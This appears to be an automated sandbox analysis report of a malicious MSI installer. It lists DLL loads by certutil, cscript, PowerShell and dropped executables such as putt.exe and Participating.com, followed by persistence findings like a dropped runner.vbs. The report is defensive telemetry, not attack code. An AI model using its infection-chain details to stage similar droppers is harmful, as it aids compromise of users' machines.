Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: comsvcs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll

Source: C:\Windows\Installer\MSIC534.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Windows\System32\msiexec.exe	Automated click: Next >
Source: C:\Windows\System32\msiexec.exe	Automated click: Next >
Source: C:\Windows\System32\msiexec.exe	Automated click: Install

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 69633f.msi

Static file information: File size 2098688 > 1048576

Source:	Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdb source: MSIC534.tmp, 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmp, MSIC534.tmp, 0000000C.00000000.1445053468.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmp, 69633f.msi, MSIC439.tmp.7.dr, MSIC534.tmp.7.dr, 53c16a.msi.7.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdbC source: MSIC534.tmp, 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmp, MSIC534.tmp, 0000000C.00000000.1445053468.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmp, 69633f.msi, MSIC439.tmp.7.dr, MSIC534.tmp.7.dr, 53c16a.msi.7.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: 69633f.msi, MSIFFBE.tmp.0.dr, MSIFDC5.tmp.0.dr, MSIC32D.tmp.7.dr, MSIFEB1.tmp.0.dr, MSIFFEE.tmp.0.dr, 53c16a.msi.7.dr

Source: C:\Users\user\AppData\Local\Temp\putt.exe

Code function: 22_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

22_2_00406328

Source: din[1].exe.17.dr	Static PE information: real checksum: 0x1598d1 should be: 0x157e95
Source: putt.exe.17.dr	Static PE information: real checksum: 0x1598d1 should be: 0x157e95

Source: MSIFDC5.tmp.0.dr	Static PE information: section name: .fptable
Source: MSIFE52.tmp.0.dr	Static PE information: section name: .fptable
Source: MSIFEB1.tmp.0.dr	Static PE information: section name: .fptable
Source: MSIFEE1.tmp.0.dr	Static PE information: section name: .fptable
Source: MSIFF11.tmp.0.dr	Static PE information: section name: .fptable
Source: MSIFFBE.tmp.0.dr	Static PE information: section name: .fptable
Source: MSIFFEE.tmp.0.dr	Static PE information: section name: .fptable
Source: MSIC32D.tmp.7.dr	Static PE information: section name: .fptable
Source: MSIC39B.tmp.7.dr	Static PE information: section name: .fptable
Source: MSIC3DB.tmp.7.dr	Static PE information: section name: .fptable
Source: MSIC534.tmp.7.dr	Static PE information: section name: .fptable

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB1CD2A5 pushad ; iretd	17_2_00007FFAAB1CD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB2E7678 push ebx; iretd	17_2_00007FFAAB2E77CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB2E752B push ebx; iretd	17_2_00007FFAAB2E756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB2E757B push ebx; iretd	17_2_00007FFAAB2E756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB3BB1F5 push edi; retn 2DC9h	17_2_00007FFAAB3BB212
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_005402D8 push cs; retn 0053h	32_2_00540318
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00510DE6 push ecx; ret	32_2_00510DF9
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0050DC7C push AA0054CFh; iretd	32_2_0050DC87

Persistence and Installation Behavior

Command shell drops VBS files

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user~1\AppData\Local\Temp\runner.vbs

Jump to behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\615578\Participating.com

Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\msiexec.exe

Executable created and started: C:\Windows\Installer\MSIC534.tmp

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIFEE1.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIFEB1.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC3DB.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC534.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIFDC5.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIFE52.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIFF11.tmp	Jump to dropped file
